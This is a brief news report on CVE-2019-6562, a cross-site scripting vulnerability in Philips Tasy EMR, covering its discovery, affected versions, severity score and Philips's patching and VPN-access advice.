A vulnerability was discovered in the Philips Tasy EMR information system. An attacker could exploit the vulnerability and send to the system unexpected data that could potentially permit an arbitrary code to be executed, change information flow, influence system integrity, and allow the attacker to have unauthorized access of patient data.
Security researcher Rafael Honorato discovered the vulnerability and reported it to Philips. Philips then notified the National Cybersecurity and Communications Integration Center about the vulnerability. ICS-CERT issued a vulnerability alert on April 30, 2019.
The vulnerability known as CVE-2019-6562 was identified in Tasy EMR versions 3.02.174 and earlier versions. It mainly affects healthcare companies in Mexico and Brazil. To date, there’s no report of the vulnerability being exploited in wild nor in public.
The cross-site scripting flaw is due to incorrect neutralization of user-controllable input at the time of generating a web page. An individual with low level skill can exploit the vulnerability on the customer web page or linking via a VPN. In spite of the potential for facts exposure, the vulnerability only has an assigned CVSS v3 base score of 4.1 of 10.
Philips has informed all Tasy EMR users to update their software to the latest three versions without delay and to make sure Service Packs are employed immediately. Philips is going to patch hosted solutions automatically. When the new software versions are released, Philips will alert users who have installed Tasy EMR on-premise.
Moreover, Philips advises sticking to the instructions written in the product configuration manual and making sure that Tasy EMR can only be accessed over the web using a VPN.